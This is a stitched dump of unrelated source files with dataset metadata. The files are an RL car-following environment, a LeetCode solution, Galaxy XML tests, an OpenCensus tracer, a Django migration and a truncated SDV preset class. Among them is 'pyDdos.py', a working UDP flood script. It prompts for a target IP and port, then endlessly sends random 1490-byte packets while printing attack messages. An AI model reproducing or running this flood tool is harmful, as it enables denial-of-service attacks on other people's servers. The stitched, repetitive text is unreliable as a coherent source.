# Calculate safe distance. Increase distance for Stop&Go scenario.
safe_distance = self.opts.desired_headway * abs(v_ego)
if v_ego < self.opts.stop_n_go_velocity:
safe_distance += self.opts.stop_n_go_distance * (1 - max(0, v_ego) / self.opts.stop_n_go_velocity)
# All variables in this dict can be used as observation, in the reward function or can be plotted.
state = {
# Time and raw commanded acceleration by agent.
't': self.t,
'a_dem': a_dem,
# Ego vehicle.
'a_ego': a_ego,
'v_ego': v_ego,
'x_ego': x_ego,
'j_ego': (a_ego - self.last_a_ego) / self.dt,
# Target vehicle.
'a_tar': a_tar,
'v_tar': v_tar,
'x_tar': x_tar,
# Relative values.
'a_rel': a_tar - a_ego,
'v_rel': v_tar - v_ego,
'x_rel': x_tar - x_ego,
# Control setpoints.
'd_safe': safe_distance,
'd_err': safe_distance - (x_tar - x_ego),
'Hw': Hw,
'dHw': dHw,
'v_err': v_tar - v_ego,
# misc
'last_a_dem': self.last_a_dem,
'last_a_ego': self.last_a_ego,
}
# Calculation upper and lower constraint for acceleration and add to state.
state["a_min"], state["a_max"] = self.constraints.calculate(state)
# end episode of ego car crashed in the lead car or car goes backwards fast
# done signal
# done = 0: not done, episode can continue
# done = 1: done, because simulated time ended
# done = 2: done, because agent ended in terminal step (e.g. crash)
done = 1 if scenario_done or (self.steps >= self._max_episode_steps - 1) else 0
done = 2 if (x_tar - x_ego) < -50 or v_ego < -5 else done
state["done"] = done
# Calculate reward and add to state.
reward = self.reward_function(state, self.opts)
state["reward"] = reward
# Store state values in buffer for later plotting.
if self.steps < self._max_episode_steps:
# Store all state variables in data_store.
for k, v in state.items():
if k not in self.data_store:
self.data_store[k] = np.zeros(self._max_episode_steps)
self.data_store[k][self.steps] = v
# Add choosen action to previous timestep in state dict.
if self.steps >= 1:
self.data_store["a_dem"][self.steps - 1] = a_dem
# Extract observations from state dict.
obs = [state[key] for key in self.opts.observations]
# Increment counter and time. Store last values.
self.steps += 1
self.t += self.dt
self.last_a_dem = a_dem
self.last_a_ego = a_ego
self.last_a_min = state["a_min"]
self.last_a_max = state["a_max"]
# OpenAI Gym compatible return: (observations, reward, done, debug_infos)
return np.array(obs, dtype=np.float32), reward, done, {}
def render(self, mode='human', close=False):
"""Live rendering not supported. See render_episode()"""
pass
def render_episode(self, prefix=""):
"""Render a complete episode at its end using the plotter in a seperate thread.
"""
if self.plotter is None:
return
self.plotter.plot([self.data_store, self.steps, prefix])
def calc_metrics(self):
"""Calculate metrics at the end of an episode.
Returns:
Dict with keys:
safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
discomfort: Metric measuring discomfort. Lower values are better.
tracking_error: Metric measuring tracking error. Lower values are better.
"""
safety = min(1, np.min(self.data_store["Hw"][0:self.steps]) / self.opts.desired_headway)
discomfort = np.mean(self.data_store["a_ego"][0:self.steps]**2) + 0.5 * np.mean(self.data_store["j_ego"][0:self.steps]**2)
tracking_error = np.mean((self.data_store["Hw"][0:self.steps] - self.opts.desired_headway)**2)
tracking_error = min(9, tracking_error)
return {"safety": safety, "discomfort": discomfort, "tracking_error": tracking_error}
|
en
| 0.797996
|
This module implements a simulated follow object control environment following OpenAI Gym interface. Custom environment for follow object control that follows OpenAI gym interface Initialize environment
Args:
opts: Namespace object with options.
plotter: Plotter object to enable plotting of each episode. # Environment parameters # store plotter for plotting of episodes # Configure timing # Define action space. Define observation space. # Create ego car object. Initial position and velocity will be set by traffic scenario. # Environment including lead car from choosen traffic scenario. # Reward function specified by options. # Load specified costraints. Seeds the whole environment.
Args:
seed: Random seed.
Returns:
Random seed. Resets environment, traffic scenario and variables
Returns:
Initial state. # Reset internal values and environment # self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario # Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten. # Return only state Simulates one environment step
Args:
action: List of chosen action.
Returns:
OpenAI Gym compatible return: Dict containing (observations, reward, done, debug_infos) # Get desired acceleration and check system boundaries. # Clip a_dem according to constraints when specified in opts # Simulate next timesteps of environment and ego_car. # Calucate correction velocity to increase distance in Stop&Go scenario. # Calulate and clip headway and its derivation. # Prevent inital value from being to big # Calculate safe distance. Increase distance for Stop&Go scenario. # All variables in this dict can be used as observation, in the reward function or can be plotted. # Time and raw commanded acceleration by agent. # Ego vehicle. # Target vehicle. # Relative values. # Control setpoints. # misc # Calculation upper and lower constraint for acceleration and add to state. # end episode of ego car crashed in the lead car or car goes backwards fast # done signal # done = 0: not done, episode can continue # done = 1: done, because simulated time ended # done = 2: done, because agent ended in terminal step (e.g. crash) # Calculate reward and add to state. # Store state values in buffer for later plotting. # Store all state variables in data_store. # Add choosen action to previous timestep in state dict. # Extract observations from state dict. # Increment counter and time. Store last values. # OpenAI Gym compatible return: (observations, reward, done, debug_infos) Live rendering not supported. See render_episode() Render a complete episode at its end using the plotter in a seperate thread. Calculate metrics at the end of an episode.
Returns:
Dict with keys:
safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
discomfort: Metric measuring discomfort. Lower values are better.
tracking_error: Metric measuring tracking error. Lower values are better.
| 2.617531
| 3
|
python/src/problem/leetcode/easy/leetcode_700.py
|
yipwinghong/Algorithm
| 9
|
6627569
|
<reponame>yipwinghong/Algorithm
# coding=utf-8
from src.data_structure.data_structure import TreeNode
class Solution:
"""
另一个树的子树
"""
def search_bst(self, root: TreeNode, val: int) -> TreeNode:
"""
Time: O(h), Space: O(1)
:param root:
:param val:
:return:
"""
while root and root.val != val:
root = root.right if root.val < val else root.left
return root
|
# coding=utf-8
from src.data_structure.data_structure import TreeNode
class Solution:
"""
另一个树的子树
"""
def search_bst(self, root: TreeNode, val: int) -> TreeNode:
"""
Time: O(h), Space: O(1)
:param root:
:param val:
:return:
"""
while root and root.val != val:
root = root.right if root.val < val else root.left
return root
|
en
| 0.29398
|
# coding=utf-8 另一个树的子树 Time: O(h), Space: O(1) :param root: :param val: :return:
| 3.51216
| 4
|
test/unit/util/test_utils.py
|
Tomasz69/galaxy
| 1
|
6627570
|
<reponame>Tomasz69/galaxy
import errno
import os
import tempfile
import pytest
from galaxy import util
SECTION_XML = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>
toolshed.g2.bx.psu.edu
</tool_shed>
</tool>
</section>
"""
def test_strip_control_characters():
s = '\x00bla'
assert util.strip_control_characters(s) == 'bla'
def test_strip_control_characters_nested():
s = '\x00bla'
stripped_s = 'bla'
l = [s]
t = (s, 'blub')
d = {42: s}
assert util.strip_control_characters_nested(l)[0] == stripped_s
assert util.strip_control_characters_nested(t)[0] == stripped_s
assert util.strip_control_characters_nested(d)[42] == stripped_s
def test_parse_xml_string():
section = util.parse_xml_string(SECTION_XML)
_verify_section(section)
def test_parse_xml_file():
with tempfile.NamedTemporaryFile(mode='w') as tmp:
tmp.write(SECTION_XML)
tmp.flush()
section = util.parse_xml(tmp.name).getroot()
_verify_section(section)
def _verify_section(section):
tool = next(iter(section))
assert sorted(tool.items()) == [
('file',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml'),
('guid',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5')
]
assert next(iter(tool)).text == 'toolshed.g2.bx.psu.edu'
def test_xml_to_string():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section)
assert len(s.split('\n')) == 1
def test_xml_to_string_pretty():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section, pretty=True)
PRETTY = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>toolshed.g2.bx.psu.edu</tool_shed>
</tool>
</section>"""
assert s == PRETTY
def test_parse_xml_enoent():
fd, path = tempfile.mkstemp()
os.close(fd)
os.remove(path)
with pytest.raises(IOError) as excinfo:
util.parse_xml(path)
assert excinfo.value.errno == errno.ENOENT
|
import errno
import os
import tempfile
import pytest
from galaxy import util
SECTION_XML = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>
toolshed.g2.bx.psu.edu
</tool_shed>
</tool>
</section>
"""
def test_strip_control_characters():
s = '\x00bla'
assert util.strip_control_characters(s) == 'bla'
def test_strip_control_characters_nested():
s = '\x00bla'
stripped_s = 'bla'
l = [s]
t = (s, 'blub')
d = {42: s}
assert util.strip_control_characters_nested(l)[0] == stripped_s
assert util.strip_control_characters_nested(t)[0] == stripped_s
assert util.strip_control_characters_nested(d)[42] == stripped_s
def test_parse_xml_string():
section = util.parse_xml_string(SECTION_XML)
_verify_section(section)
def test_parse_xml_file():
with tempfile.NamedTemporaryFile(mode='w') as tmp:
tmp.write(SECTION_XML)
tmp.flush()
section = util.parse_xml(tmp.name).getroot()
_verify_section(section)
def _verify_section(section):
tool = next(iter(section))
assert sorted(tool.items()) == [
('file',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml'),
('guid',
'toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5')
]
assert next(iter(tool)).text == 'toolshed.g2.bx.psu.edu'
def test_xml_to_string():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section)
assert len(s.split('\n')) == 1
def test_xml_to_string_pretty():
section = util.parse_xml_string(SECTION_XML)
s = util.xml_to_string(section, pretty=True)
PRETTY = """<?xml version="1.0" ?>
<section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version="">
<tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5">
<tool_shed>toolshed.g2.bx.psu.edu</tool_shed>
</tool>
</section>"""
assert s == PRETTY
def test_parse_xml_enoent():
fd, path = tempfile.mkstemp()
os.close(fd)
os.remove(path)
with pytest.raises(IOError) as excinfo:
util.parse_xml(path)
assert excinfo.value.errno == errno.ENOENT
|
en
| 0.577461
|
<?xml version="1.0" ?> <section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version=""> <tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5"> <tool_shed> toolshed.g2.bx.psu.edu </tool_shed> </tool> </section> <?xml version="1.0" ?> <section id="fasta_fastq_manipulation" name="Fasta Fastq Manipulation" version=""> <tool file="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/fb1313d79396/seq_filter_by_id/tools/seq_filter_by_id/seq_filter_by_id.xml" guid="toolshed.g2.bx.psu.edu/repos/peterjc/seq_filter_by_id/seq_filter_by_id/0.2.5"> <tool_shed>toolshed.g2.bx.psu.edu</tool_shed> </tool> </section>
| 2.317138
| 2
|
.venv/lib/python3.8/site-packages/opencensus/trace/tracer.py
|
MarkusMeyer13/graph-teams-presence
| 0
|
6627571
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from opencensus.trace import execution_context, print_exporter, samplers
from opencensus.trace.propagation import trace_context_http_header_format
from opencensus.trace.span_context import SpanContext
from opencensus.trace.tracers import context_tracer, noop_tracer
class Tracer(object):
"""The Tracer is for tracing a request for web applications.
:type span_context: :class:`~opencensus.trace.span_context.SpanContext`
:param span_context: SpanContext encapsulates the current context within
the request's trace.
:type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
:param sampler: Instances of Sampler objects. Defaults to
:class:`.ProbabilitySampler`. Other options include
:class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.
:type exporter: :class:`~opencensus.trace.base_exporter.exporter`
:param exporter: Instances of exporter objects. Default to
:class:`.Printexporter`. The rest options are
:class:`.Fileexporter`, :class:`.Printexporter`,
:class:`.Loggingexporter`, :class:`.Zipkinexporter`,
:class:`.GoogleCloudexporter`
"""
def __init__(
self,
span_context=None,
sampler=None,
exporter=None,
propagator=None):
if span_context is None:
span_context = SpanContext()
if sampler is None:
sampler = samplers.ProbabilitySampler()
if exporter is None:
exporter = print_exporter.PrintExporter()
if propagator is None:
propagator = \
trace_context_http_header_format.TraceContextPropagator()
self.span_context = span_context
self.sampler = sampler
self.exporter = exporter
self.propagator = propagator
self.tracer = self.get_tracer()
self.store_tracer()
def should_sample(self):
"""Determine whether to sample this request or not.
If the context enables tracing, return True.
Else follow the decision of the sampler.
:rtype: bool
:returns: Whether to trace the request or not.
"""
return self.sampler.should_sample(self.span_context)
def get_tracer(self):
"""Return a tracer according to the sampling decision."""
sampled = self.should_sample()
if sampled:
self.span_context.trace_options.set_enabled(True)
return context_tracer.ContextTracer(
exporter=self.exporter,
span_context=self.span_context)
return noop_tracer.NoopTracer()
def store_tracer(self):
"""Add the current tracer to thread_local"""
execution_context.set_opencensus_tracer(self)
def finish(self):
"""End all spans."""
self.tracer.finish()
def span(self, name='span'):
"""Create a new span with the trace using the context information.
:type name: str
:param name: The name of the span.
:rtype: :class:`~opencensus.trace.span.Span`
:returns: The Span object.
"""
return self.tracer.span(name)
def start_span(self, name='span'):
return self.tracer.start_span(name)
def end_span(self):
"""End a span. Update the span_id in SpanContext to the current span's
parent span id; Update the current span; Send the span to exporter.
"""
self.tracer.end_span()
def current_span(self):
"""Return the current span."""
return self.tracer.current_span()
def add_attribute_to_current_span(self, attribute_key, attribute_value):
"""Add attribute to current span.
:type attribute_key: str
:param attribute_key: Attribute key.
:type attribute_value:str
:param attribute_value: Attribute value.
"""
self.tracer.add_attribute_to_current_span(
attribute_key, attribute_value)
def trace_decorator(self):
"""Decorator to trace a function."""
def decorator(func):
def wrapper(*args, **kwargs):
self.tracer.start_span(name=func.__name__)
return_value = func(*args, **kwargs)
self.tracer.end_span()
return return_value
return wrapper
return decorator
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from opencensus.trace import execution_context, print_exporter, samplers
from opencensus.trace.propagation import trace_context_http_header_format
from opencensus.trace.span_context import SpanContext
from opencensus.trace.tracers import context_tracer, noop_tracer
class Tracer(object):
"""The Tracer is for tracing a request for web applications.
:type span_context: :class:`~opencensus.trace.span_context.SpanContext`
:param span_context: SpanContext encapsulates the current context within
the request's trace.
:type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
:param sampler: Instances of Sampler objects. Defaults to
:class:`.ProbabilitySampler`. Other options include
:class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.
:type exporter: :class:`~opencensus.trace.base_exporter.exporter`
:param exporter: Instances of exporter objects. Default to
:class:`.Printexporter`. The rest options are
:class:`.Fileexporter`, :class:`.Printexporter`,
:class:`.Loggingexporter`, :class:`.Zipkinexporter`,
:class:`.GoogleCloudexporter`
"""
def __init__(
self,
span_context=None,
sampler=None,
exporter=None,
propagator=None):
if span_context is None:
span_context = SpanContext()
if sampler is None:
sampler = samplers.ProbabilitySampler()
if exporter is None:
exporter = print_exporter.PrintExporter()
if propagator is None:
propagator = \
trace_context_http_header_format.TraceContextPropagator()
self.span_context = span_context
self.sampler = sampler
self.exporter = exporter
self.propagator = propagator
self.tracer = self.get_tracer()
self.store_tracer()
def should_sample(self):
"""Determine whether to sample this request or not.
If the context enables tracing, return True.
Else follow the decision of the sampler.
:rtype: bool
:returns: Whether to trace the request or not.
"""
return self.sampler.should_sample(self.span_context)
def get_tracer(self):
"""Return a tracer according to the sampling decision."""
sampled = self.should_sample()
if sampled:
self.span_context.trace_options.set_enabled(True)
return context_tracer.ContextTracer(
exporter=self.exporter,
span_context=self.span_context)
return noop_tracer.NoopTracer()
def store_tracer(self):
"""Add the current tracer to thread_local"""
execution_context.set_opencensus_tracer(self)
def finish(self):
"""End all spans."""
self.tracer.finish()
def span(self, name='span'):
"""Create a new span with the trace using the context information.
:type name: str
:param name: The name of the span.
:rtype: :class:`~opencensus.trace.span.Span`
:returns: The Span object.
"""
return self.tracer.span(name)
def start_span(self, name='span'):
return self.tracer.start_span(name)
def end_span(self):
"""End a span. Update the span_id in SpanContext to the current span's
parent span id; Update the current span; Send the span to exporter.
"""
self.tracer.end_span()
def current_span(self):
"""Return the current span."""
return self.tracer.current_span()
def add_attribute_to_current_span(self, attribute_key, attribute_value):
"""Add attribute to current span.
:type attribute_key: str
:param attribute_key: Attribute key.
:type attribute_value:str
:param attribute_value: Attribute value.
"""
self.tracer.add_attribute_to_current_span(
attribute_key, attribute_value)
def trace_decorator(self):
"""Decorator to trace a function."""
def decorator(func):
def wrapper(*args, **kwargs):
self.tracer.start_span(name=func.__name__)
return_value = func(*args, **kwargs)
self.tracer.end_span()
return return_value
return wrapper
return decorator
|
en
| 0.626857
|
# Copyright 2017, OpenCensus Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. The Tracer is for tracing a request for web applications.
:type span_context: :class:`~opencensus.trace.span_context.SpanContext`
:param span_context: SpanContext encapsulates the current context within
the request's trace.
:type sampler: :class:`~opencensus.trace.samplers.base.Sampler`
:param sampler: Instances of Sampler objects. Defaults to
:class:`.ProbabilitySampler`. Other options include
:class:`.AlwaysOnSampler` and :class:`.AlwaysOffSampler`.
:type exporter: :class:`~opencensus.trace.base_exporter.exporter`
:param exporter: Instances of exporter objects. Default to
:class:`.Printexporter`. The rest options are
:class:`.Fileexporter`, :class:`.Printexporter`,
:class:`.Loggingexporter`, :class:`.Zipkinexporter`,
:class:`.GoogleCloudexporter` Determine whether to sample this request or not.
If the context enables tracing, return True.
Else follow the decision of the sampler.
:rtype: bool
:returns: Whether to trace the request or not. Return a tracer according to the sampling decision. Add the current tracer to thread_local End all spans. Create a new span with the trace using the context information.
:type name: str
:param name: The name of the span.
:rtype: :class:`~opencensus.trace.span.Span`
:returns: The Span object. End a span. Update the span_id in SpanContext to the current span's
parent span id; Update the current span; Send the span to exporter. Return the current span. Add attribute to current span.
:type attribute_key: str
:param attribute_key: Attribute key.
:type attribute_value:str
:param attribute_value: Attribute value. Decorator to trace a function.
| 1.879661
| 2
|
pyDdos.py
|
leak37/pyDdos
| 0
|
6627572
|
#Made by Leak#5749
#Contributed to github
#Special thanks to NumeX
import sys
import os
import time
import socket
import random
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("toilet -fmono12 -F py ddos")
print
print ("\033[96mAuthor : Leak#5749")
print ("github :\033[0m \033[95mhttps://github.com/svrnn\033[0m")
print ("\033[96m--Py DDOS \033[0m\033[93mPyDDOS \033[0m")
print ("\033[92m-----> PyDDOS-v1 <-----\033[0m")
time.sleep(1)
print("\033[91m[--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--]")
time.sleep(1)
print("\033[92m> Put Target information\033[0m")
print
ip = input("\033[93m> Target IP\033[0m -> ")
port = input("\033[91m> Server Port\033[0m -> ")
print
print("\033[93m----- > Waiting for a moment < ----- \033[0m")
time.sleep(2)
print("\033[91m--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--")
print ("\033[91m---- > \033[93mSuccess ddosing..\033[0m \033[91m< ----\033[0m")
print ("\033[95mStarting in 1 sec \033[0m")
time.sleep(1)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print ("\033[32;1mAttacking Target \033[31;1m%s \033[32;1mwith IP \033[33;1m%s \033[32;1mwith bytes \033[34;1m%s"%(sent,ip,port))
if port == 65534:
port = 1
|
#Made by Leak#5749
#Contributed to github
#Special thanks to NumeX
import sys
import os
import time
import socket
import random
from datetime import datetime
now = datetime.now()
hour = now.hour
minute = now.minute
day = now.day
month = now.month
year = now.year
##############
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#############
os.system("toilet -fmono12 -F py ddos")
print
print ("\033[96mAuthor : Leak#5749")
print ("github :\033[0m \033[95mhttps://github.com/svrnn\033[0m")
print ("\033[96m--Py DDOS \033[0m\033[93mPyDDOS \033[0m")
print ("\033[92m-----> PyDDOS-v1 <-----\033[0m")
time.sleep(1)
print("\033[91m[--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--]")
time.sleep(1)
print("\033[92m> Put Target information\033[0m")
print
ip = input("\033[93m> Target IP\033[0m -> ")
port = input("\033[91m> Server Port\033[0m -> ")
print
print("\033[93m----- > Waiting for a moment < ----- \033[0m")
time.sleep(2)
print("\033[91m--\033[0m\033[92m--\033[0m--\033[93m--\033[0m--\033[94m--\033[0m--\033[95m--\033[0m--\033[96m--\033[0m--\033[97m--\033[92m--")
print ("\033[91m---- > \033[93mSuccess ddosing..\033[0m \033[91m< ----\033[0m")
print ("\033[95mStarting in 1 sec \033[0m")
time.sleep(1)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print ("\033[32;1mAttacking Target \033[31;1m%s \033[32;1mwith IP \033[33;1m%s \033[32;1mwith bytes \033[34;1m%s"%(sent,ip,port))
if port == 65534:
port = 1
|
en
| 0.569365
|
#Made by Leak#5749 #Contributed to github #Special thanks to NumeX ############## ############# #5749")
| 2.586241
| 3
|
accounts/migrations/0001_initial.py
|
JulienPalard/PonyConf
| 11
|
6627573
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-18 20:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
def profile_forward(apps, schema_editor):
User = apps.get_model(settings.AUTH_USER_MODEL)
Profile = apps.get_model("accounts", "Profile")
db_alias = schema_editor.connection.alias
for user in User.objects.using(db_alias).all():
Profile.objects.using(db_alias).get_or_create(user=user)
def profile_backward(apps, schema_editor):
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_number', models.CharField(blank=True, default='', max_length=16, verbose_name='Phone number')),
('sms_prefered', models.BooleanField(default=False, verbose_name='SMS prefered')),
('biography', models.TextField(blank=True, verbose_name='Biography')),
('twitter', models.CharField(blank=True, default='', max_length=100, verbose_name='Twitter')),
('linkedin', models.CharField(blank=True, default='', max_length=100, verbose_name='LinkedIn')),
('github', models.CharField(blank=True, default='', max_length=100, verbose_name='Github')),
('website', models.CharField(blank=True, default='', max_length=100, verbose_name='Website')),
('facebook', models.CharField(blank=True, default='', max_length=100, verbose_name='Facebook')),
('mastodon', models.CharField(blank=True, default='', max_length=100, verbose_name='Mastodon')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RunPython(profile_forward, profile_backward),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-18 20:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
def profile_forward(apps, schema_editor):
User = apps.get_model(settings.AUTH_USER_MODEL)
Profile = apps.get_model("accounts", "Profile")
db_alias = schema_editor.connection.alias
for user in User.objects.using(db_alias).all():
Profile.objects.using(db_alias).get_or_create(user=user)
def profile_backward(apps, schema_editor):
pass
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_number', models.CharField(blank=True, default='', max_length=16, verbose_name='Phone number')),
('sms_prefered', models.BooleanField(default=False, verbose_name='SMS prefered')),
('biography', models.TextField(blank=True, verbose_name='Biography')),
('twitter', models.CharField(blank=True, default='', max_length=100, verbose_name='Twitter')),
('linkedin', models.CharField(blank=True, default='', max_length=100, verbose_name='LinkedIn')),
('github', models.CharField(blank=True, default='', max_length=100, verbose_name='Github')),
('website', models.CharField(blank=True, default='', max_length=100, verbose_name='Website')),
('facebook', models.CharField(blank=True, default='', max_length=100, verbose_name='Facebook')),
('mastodon', models.CharField(blank=True, default='', max_length=100, verbose_name='Mastodon')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RunPython(profile_forward, profile_backward),
]
|
en
| 0.663569
|
# -*- coding: utf-8 -*- # Generated by Django 1.11.1 on 2017-11-18 20:14
| 1.957031
| 2
|
sdv/lite/tabular.py
|
HDI-Project/SDV
| 39
|
6627574
|
<reponame>HDI-Project/SDV<filename>sdv/lite/tabular.py
"""Base class for tabular model presets."""
import logging
import pickle
import sys
import warnings
import numpy as np
import rdt
from sdv.metadata import Table
from sdv.tabular import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
LOGGER = logging.getLogger(__name__)
FAST_ML_PRESET = 'FAST_ML'
PRESETS = {
FAST_ML_PRESET: 'Use this preset to minimize the time needed to create a synthetic data model.'
}
class TabularPreset():
"""Class for all tabular model presets.
Args:
name (str):
The preset to use.
metadata (dict or metadata.Table):
Table metadata instance or dict representation.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
"""
_model = None
_null_percentages = None
_null_column = False
_default_model = GaussianCopula
def __init__(self, name=None, metadata=None, constraints=None):
if name is None:
raise ValueError('You must provide the name of a preset using the `name` '
'parameter. Use `TabularPreset.list_available_presets()` to browse '
'through the options.')
if name not in PRESETS:
raise ValueError(f'`name` must be one of {PRESETS}.')
self.name = name
if metadata is None:
warnings.warn('No metadata provided. Metadata will be automatically '
'detected from your data. This process may not be accurate. '
'We recommend writing metadata to ensure correct data handling.')
if metadata is not None and isinstance(metadata, Table):
metadata = metadata.to_dict()
if metadata is not None and constraints is not None:
metadata['constraints'] = []
for constraint in constraints:
metadata['constraints'].append(constraint.to_dict())
constraints = None
if name == FAST_ML_PRESET:
self._model = GaussianCopula(
table_metadata=metadata,
constraints=constraints,
categorical_transformer='categorical_fuzzy',
default_distribution='gaussian',
rounding=None,
)
# Decide if transformers should model the null column or not.
self._null_column = constraints is not None
if metadata is not None:
self._null_column = len(metadata.get('constraints', [])) > 0
# If transformers should model the null column, pass None to let each transformer
# decide if it's necessary or not.
transformer_null_column = None if self._null_column else False
dtype_transformers = {
'i': rdt.transformers.NumericalTransformer(
dtype=np.int64,
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
min_value='auto',
max_value='auto',
),
'f': rdt.transformers.NumericalTransformer(
dtype=np.float64,
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
min_value='auto',
max_value='auto',
),
'O': rdt.transformers.CategoricalTransformer(fuzzy=True),
'b': rdt.transformers.BooleanTransformer(
nan=-1 if self._null_column else None,
null_column=transformer_null_column,
),
'M': rdt.transformers.DatetimeTransformer(
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
),
}
self._model._metadata._dtype_transformers.update(dtype_transformers)
def fit(self, data):
"""Fit this model to the data.
Args:
data (pandas.DataFrame):
Data to fit the model to.
"""
if not self._null_column:
self._null_percentages = {}
for column, column_data in data.iteritems():
num_nulls = column_data.isna().sum()
if num_nulls > 0:
# Store null percentage for future reference.
self._null_percentages[column] = num_nulls / len(column_data)
self._model.fit(data)
def _postprocess_sampled(self, sampled):
"""Postprocess the sampled data.
Add null values back based on null percentages captured in the fitting process.
Args:
